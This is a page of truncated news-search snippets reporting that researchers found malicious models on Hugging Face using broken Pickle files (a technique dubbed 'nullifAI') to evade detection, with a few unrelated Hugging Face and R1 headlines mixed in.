Cybersecurity researchers found that malware was being distributed on Hugging Face by abusing Pickle file serialisation.
The technique, called nullifAI, allows the models to bypass Hugging Face’s protective measures against malicious AI models ...
Researchers discovered two malicious ML models on Hugging Face exploiting “broken” pickle files to evade detection, bypassing ...
Hugging Face is a platform for viewing, sharing, and showcasing machine learning models, datasets, and related work. It aims ...
The popular Python Pickle serialization format, which is common for distributing AI models, offers ways for attackers to ...
Hugging Face has launched the integration of four serverless inference providers Fal, Replicate, SambaNova, and Together AI, directly into its model pages. These providers are also integrated into ...
The initiative comes after R1 stunned the artificial intelligence community by matching the performance of the most capable models built by U.S. firms, despite being built at a fraction of the cost.
Dubbed “nullifAI,” a Tactic for Evading Detection in ML Models Targeted Pickle Files, Demonstrates Fast-Growing Cybersecurity Risks Presented by ...
Results that may be inaccessible to you are currently showing.
Hide inaccessible results